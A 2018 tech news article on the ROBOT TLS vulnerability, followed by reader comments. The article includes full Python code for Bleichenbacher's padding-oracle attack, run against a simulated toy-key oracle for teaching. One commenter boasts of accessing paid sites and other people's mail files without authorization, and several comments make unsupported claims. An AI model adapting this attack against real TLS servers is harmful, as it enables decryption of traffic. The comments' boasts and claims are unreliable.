Thursday, January 11th 2018
Hack Like It's 1998: Sites Still Vulnerable to Revived ROBOT Exploit
Another week, another security bulletin in tech news, with yet another vulnerability joining Intel's Meltdown and Western Digital's My Cloud flaws in the headlines. A team of researchers recently published a paper titled "Return Of Bleichenbacher's Oracle Threat (ROBOT)". The paper shows that a well-known exploit from 1998 is still a viable way to attack the websites of even big-name companies and services such as Facebook and PayPal (in total, around 2.8% of the top 1 million sites also tested positive). ROBOT exploits a critical, 19-year-old vulnerability in TLS's RSA key exchange that lets an attacker decrypt captured traffic and sign messages on the affected site's behalf with its private key, without ever obtaining that key. The attack is still valid. Only, it's 19 years later.
The heart of the issue is a vulnerability discovered in 1998 by researcher Daniel Bleichenbacher in the TLS predecessor, Secure Sockets Layer (SSL). It is called an oracle attack because the attacker sends specially crafted ciphertexts to which the server responds, in effect, with "Yes" (the RSA padding of the decrypted block was valid) or "No" (it was not); each answer narrows the range of possible plaintexts, so given enough queries, typically tens of thousands, the attacker recovers the protected data exactly. Bleichenbacher's finding did not lead the SSL/TLS architects to remove or redesign the faulty RSA PKCS#1 v1.5 key exchange. To keep deployed systems running, they instead layered workarounds on top of workarounds, requiring every implementation to hide whether decryption succeeded, and ROBOT shows how often that goes wrong. "We were able to identify eight vendors and open-source projects and a significant number of hosts that were vulnerable to minor variations of Bleichenbacher's adaptive-chosen ciphertext attack from 1998," the researchers wrote in their research paper. "The most notable fact about this is how little effort it took us to do so. We can therefore conclude that there is insufficient testing of modern TLS implementations for old vulnerabilities." Affected products include some made by F5, Citrix, and Cisco.
"The surprising fact is that our research was very straightforward. We used minor variations of the original attack and were successful. This issue was hiding in plain sight," the researchers wrote in a blog post. "This means neither the vendors of the affected products nor security researchers have investigated this before, although it's a very classic and well-known attack."
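The yes/no narrowing described above, worked through in code. This is an added illustration, not code from the ROBOT paper or the researchers' tooling: it builds a deliberately tiny RSA key from two Mersenne primes (a constructed choice so the whole attack finishes in well under a second), lets the simulated server leak only whether a decrypted block begins with the PKCS#1 v1.5 prefix 0x00 0x02, and recovers the plaintext from those answers alone while counting the queries it took. The function names and the sample plaintext are the example's own.

```python
"""Toy Bleichenbacher (1998) padding-oracle attack on PKCS#1 v1.5 RSA.

Constructed illustration, not code from the ROBOT paper. The key is far
too small for real use; it exists only so the attack runs quickly.
"""
import secrets

P = (1 << 107) - 1               # Mersenne prime M107 (toy size, never real)
Q = (1 << 127) - 1               # Mersenne prime M127
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8    # modulus length in bytes (30 here)
B = 1 << (8 * (K - 2))           # a conforming block m satisfies 2B <= m < 3B


def pkcs1_v15_pad(msg: bytes) -> int:
    """EME-PKCS1-v1_5: 00 02 <at least 8 nonzero bytes> 00 <msg>."""
    pad_len = K - 3 - len(msg)
    if pad_len < 8:
        raise ValueError("message too long for this modulus")
    ps = bytes(secrets.choice(range(1, 256)) for _ in range(pad_len))
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")


def encrypt(msg: bytes) -> int:
    return pow(pkcs1_v15_pad(msg), E, N)


def padding_oracle(c: int) -> bool:
    """The leaky server: reveals whether c decrypts to a conforming block.
    Real hosts leak this bit as a distinct alert, timing or TCP behaviour."""
    return pow(c, D, N).to_bytes(K, "big")[:2] == b"\x00\x02"


def ceil_div(a: int, b: int) -> int:
    return -(-a // b)


def merge(intervals):
    """Union of closed integer intervals, sorted and non-overlapping."""
    out = []
    for lo, hi in sorted(intervals):
        if out and lo <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], hi))
        else:
            out.append((lo, hi))
    return out


def bleichenbacher(c: int, oracle):
    """Recover m = c^d mod N from the oracle alone. Returns (m, #queries)."""
    queries = 0

    def conforming(s: int) -> bool:
        nonlocal queries
        queries += 1
        return oracle((c * pow(s, E, N)) % N)   # asks about (m * s) mod N

    # Step 1 (blinding) is unnecessary: c is a genuine ciphertext, so s0 = 1.
    M = [(2 * B, 3 * B - 1)]
    s = ceil_div(N, 3 * B)                       # step 2a: first s >= N/(3B)
    while not conforming(s):
        s += 1
    while True:
        # Step 3: every conforming s narrows the candidate intervals for m.
        new_M = []
        for a, b in M:
            r_lo = ceil_div(a * s - 3 * B + 1, N)
            r_hi = (b * s - 2 * B) // N
            for r in range(r_lo, r_hi + 1):
                lo = max(a, ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new_M.append((lo, hi))
        M = merge(new_M)
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0], queries
        if len(M) > 1:                           # step 2b: linear search
            s += 1
            while not conforming(s):
                s += 1
        else:                                    # step 2c: halve via r
            a, b = M[0]
            r = ceil_div(2 * (b * s - 2 * B), N)
            while True:
                s_lo = ceil_div(2 * B + r * N, b)
                s_hi = (3 * B - 1 + r * N) // a
                hit = next((t for t in range(s_lo, s_hi + 1) if conforming(t)), None)
                if hit is not None:
                    s = hit
                    break
                r += 1


def attack_and_unpad(c: int):
    """Run the attack, then strip the recovered PKCS#1 v1.5 padding."""
    m, queries = bleichenbacher(c, padding_oracle)
    block = m.to_bytes(K, "big")
    return block[block.index(b"\x00", 2) + 1:], queries


if __name__ == "__main__":
    plaintext, n_queries = attack_and_unpad(encrypt(b"tls premaster"))
    print(plaintext, "recovered after", n_queries, "oracle queries")
```

The oracle here hands back the bit directly; on a real host the same bit arrives as a different TLS alert, a timing difference or a connection reset, which is exactly what the ROBOT scan looks for. A stricter oracle that also checks the eight padding bytes and the separator still falls to the same algorithm, only with far more queries; a server that follows the TLS countermeasure and behaves identically on bad padding gives `conforming` nothing to distinguish, and the attack makes no progress.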
Sources:
Return Of Bleichenbacher's Oracle Threat (ROBOT) paper; ROBOT Attack site; via Ars Technica; via TPU Forums @ user StefanM
15 Comments on Hack Like It's 1998: Sites Still Vulnerable to Revived ROBOT Exploit
You apparently can't be a hacker without a hoodie.
Nothing can really change if we still keep using protocols from 40 years ago, like TCP/IP and Ethernet and all that. You can't just turn off the internet now and fix all those things under the hood; that would require actually replacing the internet. But we also can't ever rely on not being hacked on it.
Nobody knew back then that the date '2000', and not 1999, would cause problems in certain DOS applications which had problems storing '00' as the last 2 digits of the year.
Nobody knew that Intel was shipping hardware that had built-in flaws that existed for more than 20 years and were never found until recently. I think the world is going so fast these days that due to production, costs and management, crucial parts of hardware and software are being skipped on.
People want things faster and if they can't get it they head to the competition as well. It's no secret that all Intel hardware is rejected by countries such as Russia considering the bugs / backdoors built into the CPU. For example, IMEI, which can't really be shut down but can yet be exploited.
The idea is great but the experience is that not many teams really focus on getting a genuine, solid & safe product. Look at iPhones. It takes a company from Israel to hack the device for the FBI. I mean Apple has done such a great job securing their phones that millions need to be paid in order to crack the security on these phones. That's how a decent product should be.
Talking about flaws: I remember in the past I bought a lot of HDDs from eBay, figuring out I could restore the complete history of what people did with those drives with a simple, low-level undelete tool. Not many people actually realise that dragging something into the recycle bin will actually delete the contents from the hard drive. Or that a format is not sufficient to completely wipe the data. When I sold old parts such as my own HDDs I pretty much made sure that they were overwritten at least 12 times minimum, just to prevent someone else doing what I did myself.
Napster. Great program. Similar to many other forks and programs to share stuff with everyone on the internet. Yet with one flaw: the complete C drive of many people was being shared. So it was a piece of cake to search for 'inbox.dbx' and basically download everyone's stupid IMAP / POP3 folder from Outlook Express. Oh man, I had some fun years experimenting on the internet. In the past there were a lot of triple-X websites which had their security 'flawed' in such a manner that I was able to 'write' my own user and hashed password into a .htaccess file which wasn't properly secured, and gained access to websites which normally should be paid for in the first place with a credit card.
From my experience, the world and technology are moving so fast that even I can't keep up. I really dislike Windows 10 for switching to a service model with bullshit telemetry and privacy-invading techniques. Yes, MS is capable of identifying a person just based on the details it is harvesting. MS can push an update to a particular user which grants the NSA or some shit access. Skype has a backdoor for the NSA and probably other intelligence services, and so do many other digital forms of communication. You are not safe on the internet. Privacy does not exist and companies are going further and further to completely sell all your details.
I've wrecked the telemetry that's built into W7 and made sure it's not communicating to the outside world again. When support ends for W7, I am switching over to Linux and will start focusing more and more on privacy.
Example: we take the existing format;
255.255.255.255
and we add a fifth set to the front, rendering;
255.255.255.255.255.
Any number with only four sets, representing existing addresses, would be interpreted as zeros followed by the rest of the numbers;
000.255.255.255.255.
That solution could have been integrated into existing hardware and software almost seamlessly.
Take that one step further and increase the range of numbers from 0 through 255 to 0 through 511, thus;
511.511.511.511.511
This then renders such an enormous number of addresses that every person alive or dead in the history of mankind could be allocated a thousand addresses and we'd only ever use a small fraction of the total available. And it's still easy to integrate and fully backwards compatible with the existing IPV4 standard, making a transition easy. The hex-based mess they came up with is comparatively inefficient, at the same time overly complex and almost completely incompatible with IPV4. IMHO it was/is a move that was completely mental and absurd.
As to this news/OP, the NSA probably shed another tear.
Also, the uniformity of TLS/SSL makes it vulnerable as a system. HTTPS should really be replaced by a protocol that's more able to evolve (servers add newer, better, more diversified security technology that browsers can quickly implement and switch to/from as needed). Find a vulnerability and it should only affect a small portion of the internet.
Basic mathematical principles state that no number is too big. Take any number you can think of and add 1. So applying that principle to byte math, take 4 bytes and add 1 byte. You get 5 bytes, or 40 bits. Keep adding until you reach a bit/byte number that is sufficient to the needs of the task. We have generally gone by powers of two because it makes some things easier, but there is nothing actually limiting us from using other schemes. Example: there have been 3-bit, 5-bit, 6-bit, 7-bit, 9-bit and 12-bit CPUs. It's why we have so many color palette sizes for graphic display arrays: 1, 2, 4, 8, 10, 12, 14, 15, 16, 20, 24 and 32-bit color palettes and so on. The same is true for storage. Microsoft Server 2003 is a 32-bit OS and yet it can address up to 64GB of RAM. How do they do this? A 36-bit memory address space applied via PAE. That math, used in network transmission protocols, is identical in practice. Need more address space? Add a few bits or a byte, or a set of bytes, to the scheme. We don't have to rewrite the whole system to accommodate more address space. The only action needed is the application of basic math: addition. K.I.S.S. Now this is a very good point!